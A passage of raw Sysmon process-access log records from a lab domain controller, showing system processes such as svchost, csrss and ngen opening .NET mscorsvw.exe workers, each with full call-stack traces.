ET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DF01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.765{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DF01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DF01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.734{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DE01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.718{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DE01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.718{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DE01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DD01-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.671{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DD01-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.671{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DD01-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DC01-00000000A301}3224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.640{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DC01-00000000A301}3224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.640{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DC01-00000000A301}3224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DB01-00000000A301}3808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.546{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DB01-00000000A301}3808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.546{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DB01-00000000A301}3808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DA01-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.500{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DA01-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.500{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DA01-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D901-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.312{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D901-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.312{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D901-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.234{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D801-00000000A301}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.218{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D801-00000000A301}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
